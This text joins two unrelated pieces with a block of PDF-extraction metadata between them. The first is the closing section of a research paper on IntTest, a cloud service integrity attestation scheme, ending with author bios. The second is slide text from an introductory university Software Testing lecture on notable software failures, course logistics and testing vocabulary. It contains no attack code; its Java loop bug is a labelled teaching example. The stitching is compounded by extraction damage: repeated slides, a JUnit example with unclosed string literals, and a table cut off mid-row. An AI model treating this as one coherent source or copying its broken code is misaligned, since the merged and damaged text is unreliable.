Figure 8(b) shows the malicious service provider detection accuracy results under the conservative attack scenarios. All the other experiment parameters are kept the same as the previous experiments. The results show that IntTest can consistently achieve higher detection rate and lower false alarm rate than the other alternatives. In the conservative attack scenario, as shown by Figure 8(b), the false alarm rate of IntTest first increases when a small percentage of service functions are attacked and then drops to zero quickly with more service functions are attacked. This is because when attackers only attack a few service functions where they can take majority, they can hide themselves from our detection scheme while tricking our algorithm into labeling benign service providers as malicious. However, if they attack more service functions, they can be detected since they incur more inconsistency links with benign service providers in the global inconsistency graph. Note that majority voting based schemes can also detect malicious attackers if attackers fail to take majority
We now evaluate the effectiveness of our result auto-correction scheme. We compare the result quality without auto-correction and with auto-correction, and also investigate the impact of the attestation probability. Figure 10(a) and Figure 10 show the result quality under non-colluding attacks with 20% malicious nodes and colluding attacks with 40% malicious nodes respectively. We vary the attestation probability from 0.2 to 0.4. In both scenarios, IntTest can achieve significant result quality improvement without incurring any extra overhead other than the attestation overhead. IntTest can achieve higher result quality improvement under higher node misbehaving probability. This is because IntTest can detect the malicious nodes earlier so that it can correct more compromised data using the attestation data.
Figure 11 compares the overhead of the four schemes in terms of the percentage of attestation traffic compared to the original data traffic (i.e., the total number of duplicated data tuples used for attestation over the number of original data tuples). The data rate is 300 tuples per second. Each experiment run processes 20,000 data tuples. IntTest and RunTest save more than half attestation traffic than PTMV, and incur an order of magnitude less attestation overhead than FTMV. Additional overhead analysis details are available in section 3 of the online supplemental material.
6 LIMITATION DISCUSSION
Although we have shown that IntTest can achieve better scalability and higher detection accuracy than existing schemes, IntTest still has a set of limitations that require further study. A detailed limitation discussion can be found in Section 4 of the online supplementary material. We now provide a summary of the limitations of our approach. First, malicious attackers can still escape the detection if they only attack a few service functions, take majority in all the compromised service functions, and have less inconsistency links than benign service providers. However, IntTest can effectively limit the attack scope and make it difficult to attack popular service functions. Second, IntTest needs to assume the attested services are input deterministic where benign services will return the same or similar results defined by a distance function for the same input. Thus, IntTest cannot support those service functions whose results vary significantly based on some random numbers or timestamps.
7 CONCLUSION
In this paper, we have presented the design and implementation of IntTest, a novel integrated service integrity attestation framework for multi-tenant software-as-a-service cloud systems. IntTest employs randomized replay-based consistency check to verify the integrity of distributed service components without imposing high overhead to the cloud infrastructure. IntTest performs integrated analysis over both consistency and inconsistency attestation graphs to pinpoint colluding attackers more efficiently than existing techniques. Furthermore, IntTest provides result auto-correction to automatically correct compromised results to improve the result quality. We have implemented IntTest
and tested it on a commercial data stream processing platform running inside a production virtualized cloud computing infrastructure. Our experimental results show that IntTest can achieve higher pinpointing accuracy than existing alternative schemes. IntTest is lightweight, which imposes low performance impact to the data processing services running inside the cloud computing infrastructure.
ACKNOWLEDGMENTS
This work was sponsored in part by U.S. Army Research Office (ARO) under grant W911NF-08-1-0105 managed by NCSU Secure Open Systems Initiative (SOSI), NSF CNS-0915567, and NSF IIS-0430166. Any opinions expressed in this paper are those of the authors and do not necessarily reflect the views of the ARO, NSF or U.S. Government.
REFERENCES
Daniel J. Dean is a PhD student in the Department of Computer Science at North Carolina State University. He received a BS and MS in computer science from Stony Brook University, New York in 2007 and 2009 respectively. He has interned with NEC Labs America in the summer of 2012 and is a student member of the IEEE.
Yongmin Tan is a software engineer in MathWorks. He currently focuses on modeling distributed systems for Simulink. His general research interests include reliable distributed systems and cloud computing. He received his PhD degree in 2012 from the Department of Computer Science, North Carolina State University. He received his BE degree and ME degree, both in Electrical Engineering from Shanghai Jiaotong University in 2005 and 2008 respectively. He has interned with NEC Labs America in 2010. He is a recipient of the best paper award from ICDCS 2012.
Xiaohui Gu is an assistant professor in the Department of Computer Science at the North Carolina State University. She received her PhD degree in 2004 and MS degree in 2001 from the Department of Computer Science, University of Illinois at Urbana-Champaign. She received her BS degree in computer science from Peking University, Beijing, China in 1999. She was a research staff member at IBM T. J. Watson Research Center, Hawthorne, New York, between 2004 and 2007. She received ILLIAC fellowship, David J. Kuck Best Master Thesis Award, and Saburo Muroga Fellowship from University of Illinois at Urbana-Champaign. She also received the IBM Invention Achievement Awards in 2004, 2006, and 2007. She has filed eight patents, and has published more than 50 research papers in international journals and major peer-reviewed conference proceedings. She is a recipient of NSF Career Award, four IBM Faculty Awards 2008, 2009, 2010, 2011, and two Google Research Awards 2009, 2011, a best paper award from IEEE CNSM 2010, and NCSU Faculty Research and Professional Development Award. She is a Senior Member of IEEE.
Ting Yu is an Associate Professor in the Department of Computer Science, North Carolina State University. He obtained his PhD from the University of Illinois at Urbana-Champaign in 2003, MS from the University of Minnesota in 1998, and BS from Peking University in 1997, all in computer science. His research is in security, with a focus on data security and privacy, trust management and security policies. He is a recipient of the NSF CAREER Award.
|
{"Source-Url": "http://feihu.eng.ua.edu/bigdata/week12_2.pdf", "len_cl100k_base": 9307, "olmocr-version": "0.1.50", "pdf-total-pages": 11, "total-fallback-pages": 0, "total-input-tokens": 39830, "total-output-tokens": 10729, "length": "2e13", "weborganizer": {"__label__adult": 0.0004107952117919922, "__label__art_design": 0.00048661231994628906, "__label__crime_law": 0.00127410888671875, "__label__education_jobs": 0.001251220703125, "__label__entertainment": 0.00014507770538330078, "__label__fashion_beauty": 0.0002009868621826172, "__label__finance_business": 0.000690460205078125, "__label__food_dining": 0.0003781318664550781, "__label__games": 0.0009508132934570312, "__label__hardware": 0.0014429092407226562, "__label__health": 0.0007681846618652344, "__label__history": 0.0003616809844970703, "__label__home_hobbies": 0.00010383129119873048, "__label__industrial": 0.0004940032958984375, "__label__literature": 0.0003879070281982422, "__label__politics": 0.0004978179931640625, "__label__religion": 0.00040793418884277344, "__label__science_tech": 0.20458984375, "__label__social_life": 0.0001533031463623047, "__label__software": 0.02960205078125, "__label__software_dev": 0.75439453125, "__label__sports_fitness": 0.00026702880859375, "__label__transportation": 0.0005116462707519531, "__label__travel": 0.00020492076873779297}, "weborganizer_max": "__label__software_dev", "avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_v1__avg_fraction_numbers_in_line_ratio": [[0, 48652, 0.0194]], "fineweb_edu_fasttext_gt2__fineweb_edu_fasttext_gt2__score": [[0, 48652, 0.22382]], "ft_lang_id_en_doc_v2__ft_lang_id_en_doc_v2__en": [[0, 48652, 0.89777]], "google_gemma-3-12b-it_contains_pii": [[0, 4036, false], [4036, 9701, null], [9701, 15228, null], [15228, 21761, null], [21761, 24382, null], [24382, 29628, null], [29628, 34183, null], [34183, 39272, null], [39272, 42414, null], [42414, 46215, null], [46215, 48652, null]], "google_gemma-3-12b-it_is_public_document": [[0, 4036, true], [4036, 9701, null], [9701, 15228, null], [15228, 21761, null], [21761, 24382, null], [24382, 29628, null], [29628, 34183, null], [34183, 39272, null], [39272, 42414, null], [42414, 46215, null], [46215, 48652, null]], "google_gemma-3-4b-it_v2tag__is_academic_paper": [[0, 5000, true], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_class_syllabus": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_completion_certificate": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_court_notice": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_homework_assignment": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_news_article": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_public_order": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_resume_cv": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_test_or_quiz": [[0, 5000, false], [5000, 48652, null]], "google_gemma-3-4b-it_v2tag__is_textbook": [[0, 5000, false], [5000, 48652, null]], "pdf_page_numbers": [[0, 4036, 1], [4036, 9701, 2], [9701, 15228, 3], [15228, 21761, 4], [21761, 24382, 5], [24382, 29628, 6], [29628, 34183, 7], [34183, 39272, 8], [39272, 42414, 9], [42414, 46215, 10], [46215, 48652, 11]], "pipe_delimited_lines_v1__pipe_delimited_lines_v1__pipe_delimited_lines_ratio": [[0, 48652, 0.11024]]}
|
olmocr_science_pdfs
|
2024-11-27
|
2024-11-27
|
1fc1bbf40b0fce1a2bef7d93baa460e206e6143b
|
LTAT.05.006: Software Testing
Lecture 01: Introduction to Software Testing
Spring 2020
Dietmar Pfahl
email: dietmar.pfahl@ut.ee
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
2012: Knight Capital loses 440M USD
- August 12th: New Trading Software installed
- Administrator forgets to deploy on one out of eight server nodes
- New code repurposed a flag previously used for testing scenarios
- On that one server node, old trading algorithm interprets flag differently and starts buying and selling 100 different stocks randomly without human verification
- NYSE has to suspend trade of several stocks
- Knight Capital loses 440 Mio USD in only 30 minutes, until system is suspended
- Investors have to raise 400 Mio USD in order to rescue the company
#1 Explosion of Ariane 5, 1996
OH, WELL! I BET THAT CODE NEVER GETS USED, ANYWAY.
ERROR!!
ARIANE-5
EXPLODE!
...MUH.
Uber’s car fatal car crash in Arizona, 2018
“The fatal crash that killed pedestrian Elaine Herzberg in Tempe, Arizona, in March occurred because of a software bug in Uber's self-driving car technology (...). According to two anonymous sources (...), Uber's sensors did, in fact, detect Herzberg as she crossed the street with her bicycle. Unfortunately, the software classified her as a "false positive" and decided it didn't need to stop for her.
Distinguishing between real objects and illusory ones is one of the most basic challenges of developing self-driving car software. Software needs to detect objects like cars, pedestrians, and large rocks in its path and stop or swerve to avoid them. However, there may be other objects—like a plastic bag in the road or a trash can on the sidewalk—that a car can safely ignore. Sensor anomalies may also cause software to detect apparent objects where no objects actually exist.
Software designers face a basic tradeoff here. If the software is programmed to be too cautious, the ride will be slow and jerky, as the car constantly slows down for objects that pose no threat to the car or aren't there at all. Tuning the software in the opposite direction will produce a smooth ride most of the time—but at the risk that the software will occasionally ignore a real object.”
List of SW Problems from Guru99 /1
- In April 2015, Bloomberg terminal in London crashed due to software glitch affected more than 300,000 traders on financial markets. It forced the government to postpone a 3bn pound debt sale.
- Nissan cars have to recall over 1 million cars from the market due to software failure in the airbag sensory detectors. There has been reported two accident due to this software failure.
- Starbucks was forced to close about 60 percent of stores in the U.S and Canada due to software failure in its POS system. At one point store served coffee for free as they were unable to process the transaction.
List of SW Problems from Guru99 /2
• Some of the Amazon’s third party retailers saw their product price is reduced to 1p due to a software glitch. They were left with heavy losses.
• Vulnerability in Window 10. This bug enables users to escape from security sandboxes through a flaw in the win32k system.
• In 2015, fighter plane F-35 fell victim to a software bug, making it unable to detect targets correctly.
• In may of 1996, a software bug caused the bank accounts of 823 customers of a major U.S. bank to be credited with 920 million US dollars.
List of SW Problems from Guru99 /3
- In April of 1999, a software bug caused the failure of a $1.2 billion military satellite launch, the costliest accident in history
- China Airlines Airbus A300 crashed due to a software bug on April 26, 1994, killing 264 persons
- In 1985, Canada's Therac-25 radiation therapy machine malfunctioned due to software bug and delivered lethal radiation doses to patients, leaving 3 people dead and critically injuring 3 others.
What is Software Testing?
What is Software Testing? (Static & Dynamic)
Confirm quality *(pass-test)*
vs.
Find defects *(fail-test)*
Cost of Testing / Cost of not Testing
2014 industrial survey of 1543 executives from 25 countries:
• Testing and quality assurance of software-intensive systems accounts for roughly 26% of IT budgets [1]
2013 study by researchers at the University of Cambridge:
• Global cost of locating and removing bugs from software has risen to $312 billion annually and it makes up half of the development time of the average project [2].
Sources:
Recall Exercise: A Pen
- Quality?
- Testing?
Software Quality – Definition
- **Software quality is the degree of** conformance to explicit or implicit requirements and expectations
Explanation:
- *Explicit*: clearly defined and documented
- *Implicit*: not clearly defined and documented but indirectly suggested
- *Requirements*: business/product/software requirements
- *Expectations*: mainly end-user expectations
Software Product Quality Model – ISO 25010 Standard
Safety ?
Software Product Quality Model
– ISO 25010 Standard
Software Quality Assurance (SQA)
versus
Software Quality Control (SQC)
Software Quality Assurance (SQA)
- SQA is a set of activities for ensuring quality in software engineering processes (that ultimately result in quality in software products).
It includes the following activities:
- Process definition
- Process implementation
- Auditing
- Training
Processes could be:
- Software Development Methodology
- Project Management
- Configuration Management
- Requirements Development/Management
- Estimation
- Software Design
- Testing
- ...
Software Quality Control (SQC)
- SQC is a set of activities for ensuring quality in software products.
It includes the following activities:
- Reviews
- Testing
(Dynamic) Testing:
- Unit Testing
- Integration Testing
- System Testing
- Acceptance Testing
Reviews:
- Requirement Review
- Design Review
- Code Review
- Deployment Plan Review
- Test Plan Review
- Test Cases Review
Verification versus Validation
Validation versus Verification
Requirements Backlog
(e.g., User Stories)
Work Product
Work Product
...
Work Product
Development Process
End Product
(i.e., the Software that is delivered/deployed)
Validation versus Verification
Requirements Backlog
(e.g., User Stories)
Work Product
Work Product
...
Development Process
End Product
(i.e., the Software that is delivered/deployed)
Validation versus Verification
Requirements Backlog (e.g., User Stories) → Work Product → Work Product → Work Product → End Product (i.e., the Software that is delivered/deployed)
Development Process
Verification vs. Validation
Source: SEI at CMU, Donald Firesmith
Verification
Definition
• The process of evaluating work-products (not the actual final product) of a development phase to determine whether they meet the specified requirements for that phase.
Objective
• To ensure that the product is being built according to the requirements and design specifications. In other words, to ensure that work products meet their specified requirements.
Question
• Are we building the product right?
Validation
Definition
• The process of evaluating software during or at the end of the development process to determine whether it satisfies specified (or implicit) business requirements.
Objective
• To ensure that the product actually meets the user’s needs, and that the requirements were correct in the first place. In other words, to demonstrate that the product fulfills its intended use when placed in its intended environment.
Question
• Are we building the right product?
Evaluation Items:
- User requirements, Final product/software
Activities:
- Requirements review, Acceptance testing
Test Complexity – Quiz
Example:
- 30 variables, 2 levels
- Test all combinations
How long does it take to test, if 5 tests/sec can be executed automatically?
Answer choices:
1. Less than 10 sec
2. Less than 1 min
3. Less than 1 hour
4. Less than 1 day
5. Less than 1 year
6. More than 1 year
Test Complexity
Example:
- 30 variables, 2 levels
-> $2^{30} \approx 10^9$
combinations to test
- 5 tests/second ->
214748364.8 sec or
6.8 years of testing!
How to test when correct SW output is unknown?
Scientific calculations
Artificial intelligence
Simulation and modelling
How to test when correct SW output is unknown?
Idea: Metamorphic Testing
Example of Metamorphic Testing: Google Maps Navigator
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Course Information/Overview
- **Level:** Course at bachelor's level (in English), 2nd year
- **Credits:** 6 ECTS
- **Prerequisite:**
- Compulsory: MTAT.03.094/LTAT.05.003 Software Engineering (6 ECTS)
- Recommended: MTAT.03.130 Object-oriented Programming (6 ECTS)
- **Work load:**
- Lectures (incl. practical work): 64 person-hours – incl. lab and exam sessions
- Independent work (outside classroom): 92 person-hours
- **Assessment:**
- 11 Homework Assignments (work in pairs) – 60% of grade (~5 ph per lab = 55 ph)
- 10 Quizzes (individual) – 10% of grade (~10 ph)
- Exam (written) – 30% of grade (~27 ph)
- **Grade scale:** A (90%+), B(80%+), C(70%+), D(60%+), E(50%+), F
Letter Grades
- **A** - An excellent performance, clearly outstanding. The candidate demonstrates excellent judgement and a high degree of independent thinking.
- **B** - A very good performance. The candidate demonstrates sound judgement and a very good degree of independent thinking.
- **C** - A good performance in most areas. The candidate demonstrates a reasonable degree of judgement and independent thinking in the most important areas.
- **D** - A satisfactory performance, but with significant shortcomings. The candidate demonstrates a limited degree of judgement and independent thinking.
- **E** - A performance that meets the minimum criteria, but no more. The candidate demonstrates a very limited degree of judgement and independent thinking.
- **F** - A performance that does not meet the minimum academic criteria. The candidate demonstrates an absence of both judgement and independent thinking.
ECTS recommended distribution:
A: 10% B: 25% C: 30% D: 25% E: 10%
ECTS = European Credit Transfer and Accumulation System
Lectures (Delta room 1021)
- Lecture 1 (13.02) – Introduction to Software Testing
- Lecture 2 (20.02) – Basic Black-Box Testing Techniques: Boundary Value Analysis & Equivalence Class Partitioning
- Lecture 3 (27.02) – BBT advanced: Combinatorial Testing
- Lecture 4 (05.03) – Basic White-Box Testing Techniques: Control-Flow Coverage
- Lecture 5 (12.03) – Test Lifecycle, Test Levels, Test Tools
- Lecture 6 (19.03) – BBT adv.: State-Transition, Metamorphic, Random Testing
- Lecture 7 (26.03) – BBT adv.: Exploratory Testing, Behaviour Testing
- Lecture 11 (23.04) – Defect Estimation / Test Documentation, Organisation and Process Improvement (Test Maturity Model)
- Lectures 12+13 (30.04 + 07.05) – Industry Guest Lectures (to be announced)
- Lecture 14 (14.05) – Exam Preparation
# Lectures / Labs (HW) / Quiz Schedule
<table>
<thead>
<tr>
<th>W24</th>
<th>W25</th>
<th>W26</th>
<th>W27</th>
<th>W28</th>
<th>W29</th>
<th>W30</th>
<th>W31</th>
<th>W32</th>
<th>W33</th>
<th>W34</th>
<th>W35</th>
<th>W36</th>
<th>W37</th>
</tr>
</thead>
<tbody>
<tr>
<td>Lec 1</td>
<td>Lec 2</td>
<td>Lec 3</td>
<td>Lec 4</td>
<td>Lec 5</td>
<td>Lec 6</td>
<td>Lec 7</td>
<td>Lec 8</td>
<td>Lec 9</td>
<td>Lec 10</td>
<td>Lec 11</td>
<td>Lec 12</td>
<td>Lec 13</td>
<td>Lec 14</td>
</tr>
<tr>
<td>HW 1</td>
<td>X</td>
<td>HW 2</td>
<td>X</td>
<td>HW 3</td>
<td>X</td>
<td>HW 4</td>
<td>X</td>
<td>HW 5</td>
<td>X</td>
<td>HW 6</td>
<td>X</td>
<td>HW 7</td>
<td>X</td>
</tr>
<tr>
<td>Q 1</td>
<td>X</td>
<td>Q 2</td>
<td>X</td>
<td>Q 3</td>
<td>X</td>
<td>Q 4</td>
<td>X</td>
<td>Q 5</td>
<td>X</td>
<td>Q 6</td>
<td>X</td>
<td>Q 7</td>
<td>X</td>
</tr>
<tr>
<td>Q 9</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
<td>X</td>
</tr>
</tbody>
</table>
Lab Assignments (HW) to be submitted via course wiki
(1 week time / strict deadlines / 24 h grace period with penalty – afterwards 0 points)
Quizzes to be done in Moodle
(2 attempts / 15 min each / Fri 9:00 am– Mon 11:30 am / 10 best count)
Lab Sessions (Delta -… various rooms)
Preparation, Execution, Report – **Work in Pairs**
Lab 1 (week 25: Feb 18 & 19) - Debugging (10 marks)
Lab 2 (week 26: Feb 25 & 26) - Basic Black-Box-Testing (10 marks)
Lab 3 (week 27: Mar 03 & 04) - Combinatorial Testing (10 marks)
Lab 4 (week 28: Mar 10 & 11) - Basic White-Box Testing (10 marks)
Lab 5 (week 29: Mar 17 & 18) - Random Testing (10 marks) **New**
Lab 6 (week 30: Mar 24 & 26) - Automated Web-App Testing (10 marks)
Lab 7 (week 31: M 02 & A 01) - Web-App Testing in the CI/CD Pipeline (10 marks)
Lab 8 (week 32: Apr 07 & 08) - Automated GUI || Visual Testing (10 marks)
Lab 9 (week 33: Apr 14 & 15) - Mutation Testing (10 marks)
Lab 10 (week 34: Apr 21 & 22) - Static Code Analysis (10 marks)
Lab 11 (week 36: May 05 & 06) - Doc Inspection and Defect Prediction (10 marks)
**Send reports via submission button on course wiki before your next lab starts. Only PDF files will be accepted.**
GO TO LABS !!!!!
(if you don’t, you will lose marks)
Final Exam
Written exam (30%)
- Based on textbook, lectures and lab sessions
- Multiple-choice part closed book / Other parts open book & open laptop
Dates:
- Exam 2: Monday, 01-June-2020, 16:15-17:55, rooms 2004/5/6 - capacity limit: 80
- Retake Exam (resit): to be announced
Books on SW Testing
Software Testing: From Theory to Practice
• By: Maurício Aniche and Arie van Deursen (TU Delft, The Netherlands)
Link: https://sttp.site
The Fuzzing Book - Tools and Techniques for Generating Software Tests
• By: Andreas Zeller, Rahul Gopinath, Marcel Böhme, Gordon Fraser, and Christian Holler
Link: https://www.fuzzingbook.org
Introduction to Software Testing
• By: P. Ammann and J. Offutt
• Year 2017 (2nd ed.)
Software Testing
Course Responsible / Instructor: Dietmar Pfahl (dietmar.pfahl at ut dot ee) - room: 3007 (Delta)
Lab Supervisors (TAs):
- Ezequiel Scott (ezequielscott at gmail dot com)
- Claudia Kittask (claudiakittask at gmail dot com)
- Yar Muhammad (yar dot muhammad at ut dot ee)
- Amit Kumar Singh (amit dot kumar dot singh at ut dot ee)
Lectures (begin in week 24 of the academic year, on 13-Feb-2020):
- Thursday 10:15 - 12:00, Narva mnt 18 - r1021 (Delta building)
Labs (practice learning; begin in week 25, on 18/19-Feb-2020):
- Group 1: Tuesday 10.15 - 11.45, Delta r2045 - Ezequiel
- Group 2: Tuesday 10.15 - 11.45, Delta r2034 - Claudia
- Group 3: Tuesday 12.15 - 13.45, Delta r2034 - Ezequiel
- Group 5: Wednesday 12.15 - 13.45, r2048 - Yar (Note: Yar’s two lab groups had to be merged due to a scheduling conflict)
Quizzes:
SIGN UP TO MESSAGE BOARD (Slack)
(if you don’t, you will miss up to date info)
Sign-Up Link for Slack
• Before the first labs start next week, please sign up to the course Slack channel. You will get your homework feedback exclusively via Slack from the lab supervisors.
Here is the sign-up link:
• <see link in email of Monday, Feb 10>
Structure of Lecture 1
• Introduction and Motivation
• Course Information
• Basic Vocabulary
• Lab 1
Recall SE Lecture 9
Test Case
- A **Test Case** is a set of conditions or variables under which a tester will determine whether a system under test satisfies requirements or works correctly.
- Templates and examples of formal test case documentation can be found here:
http://softwaretestingfundamentals.com/test-case/
Test Case
A Test Case consists of:
- A set of inputs + expected outputs
- Execution conditions
Example of ‘execution condition’:
When pressing the ‘save’ button of a word processor, what happens depends on what you did previously (e.g., what you typed in or deleted)
Test Suite = set of Test Cases
Test Data = input to a Test Case
Test Oracle = condition that determines whether a test case passed or failed (-> fail happens if actual output is different from expected output)
Test Verdict = decision of whether a test passed or failed
<table>
<thead>
<tr>
<th>ID</th>
<th>Condition to be tested</th>
<th>Execution condition</th>
<th>Test data</th>
<th>Expected result</th>
<th>Outcome</th>
</tr>
</thead>
<tbody>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
<td></td>
</tr>
</tbody>
</table>
Test Case – Recommendations
• As far as possible, write test cases in such a way that you test only one thing at a time. Do not overlap or complicate test cases. Attempt to make your test cases ‘atomic’.
• Ensure that all positive scenarios and negative scenarios are covered.
• Language:
• Write in simple and easy to understand language.
• Use active voice: Do this, do that.
• Use exact and consistent names (of forms, fields, etc).
• Characteristics of a good test case:
• Accurate: Exacts the purpose.
• Economical: No unnecessary steps or words.
• Traceable: Capable of being traced to requirements.
• Repeatable: Can be used to perform the test over and over.
• Reusable: Can be reused if necessary.
Test Script
- A **Test Script** is a set of instructions (written using a scripting/programming language) that is performed on a system under test to verify that the system performs as expected.
- Test scripts are used in automated testing.
- Examples of Test Frameworks supporting test scripting:
- JUnit, Selenium, Sikuli, …
Test Script – Examples
JUnit
def sample_test_script (self):
type ("TextA")
click (ImageButtonA)
assertExist (ImageResultA)
@Test
public void shortRegularRental() {
Customer customer = new Customer("Cust");
Movie movie = new Movie("Groundhog Day", REGULAR);
Rental rental = new Rental(movie, 2); // 2 days rental = short
customer.addRental(rental);
String expected = "Rental Record for Cust
expected += "\tGroundhog Day\t2.0\n
expected += "Amount owed is 2.0\n
expected += "You earned 1 frequent renter points"
Assert.assertEquals(expected, customer.statement());
}
What is a ‘Bug’ in SE?
First ‘Computer Bug’ in 1947
The term "bug" was used in an account by computer pioneer Grace Hopper, who publicized the cause of a malfunction in an early electromechanical computer. (Harvard’s Mark II relay computer)
Source: https://en.wikipedia.org/wiki/Software_bug
What is a Bug in SE?
Error?
Fault?
if amountOf(baby) > 1
answer = "Twins";
if equals(baby, baby1)
answer = "Twins";
print(answer);
...
Definition 1: Error – Fault – Failure
(according to IEEE Standard)
• **Failure** is an event caused by a **fault**, and a **fault** is
an anomaly of the software caused by an **error**
• **Error** – mistake made by human (e.g., programmer)
• **Fault** – wrong/missing statement in the software (code)
• **Failure** – inability to perform the program’s required
functions (correctly)
• Defect ? – Bug ?
• **Debugging** / Fault localization – localizing, repairing,
re-testing.
Origins and Impact of Faults
Fault sources
- Lack of skills/training
- Oversight
- Poor communication
- ‘Lost in translation’
- Immature process
Fault context
- Impact on / of software program
Errors → Faults → Failures
User’s point of view
- Poor quality software
- User dissatisfaction
Source:
Fig 3.1 in I. Burnstein: Practical Software Testing
Definition 2: Error – Fault – Failure
(as it is often used in IDEs/tools)
- **Failure** is an event caused by an **error**, **error** is a state of the program caused by a **fault** in the code
- **Fault** – wrong/missing statement in code (resulting in error)
- **Error** – incorrect program state (may result in a failure)
- **Failure** – inability to perform its required functions (correctly)
- **Defect** ? – **Bug** ?
- **Debugging** / Fault localization – localizing, repairing, re-testing.
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result?
x = [2,7,0] Actual result?
x = [0,7,2] Fault? Error? Failure?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result? ?
x = [2,7,0] Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
class Example {
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
}
```
Inputs:
- Correct (=Expected) result? 1
- x = [2,7,0]
- Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result? 1
- x = [2,7,0] Actual result? 1
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result?
- 1
- Actual result?
- 1
- Fault? Error? Failure?
- ? / ? / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- x = [2,7,0] Correct (=Expected) result? 1
- x = [0,7,2] Actual result? 1
- Fault? Error? Failure? Yes / ? / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
State 1:
P C=public static ...
x=[2, 7, 0]
count=?
i=?
State 2:
P C=int count = ...
x=[2, 7, 0]
count=0
i=1
State 3:
P C=for (int i = ...
x=[2, 7, 0]
count=0
i=1
Inputs:
Correct (=Expected) result? 1
x=[2, 7, 0]
Actual result? 1
Fault? Error? Failure? Yes / Yes / No
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
Correct (=Expected) result? ?
Actual result? ?
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs:
- Correct (=Expected) result? 1
- Actual result? 0
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
Example:
```java
public static int numZero (int[] x) {
// Effects: if x==null throw NullPointerException
// else return the number of occurrences of 0 in x
int count = 0;
for (int i = 1; i < x.length; i++) {
if (x[i] == 0) {
count++;
}
}
return count;
}
```
Inputs: Correct (=Expected) result? 1
Actual result? 0
x = [0,7,2] Fault? Error? Failure? Yes / Yes / Yes
Program state: x, i, count, PC
Definition 2: Error – Fault – Failure
We have seen ...
Fault = Yes
Error = Yes
------------------
Failure = No
or
Failure = Yes
Definition 2: Error – Fault – Failure
Could any of this happen?
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td>No</td>
<td>Yes</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Yes</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
<td></td>
</tr>
<tr>
<td>Yes</td>
<td>Yes</td>
<td>Yes</td>
</tr>
</tbody>
</table>
or
<table>
<thead>
<tr>
<th>Fault</th>
<th>Error</th>
<th>Failure</th>
</tr>
</thead>
<tbody>
<tr>
<td>No</td>
<td>No</td>
<td>No</td>
</tr>
<tr>
<td></td>
<td></td>
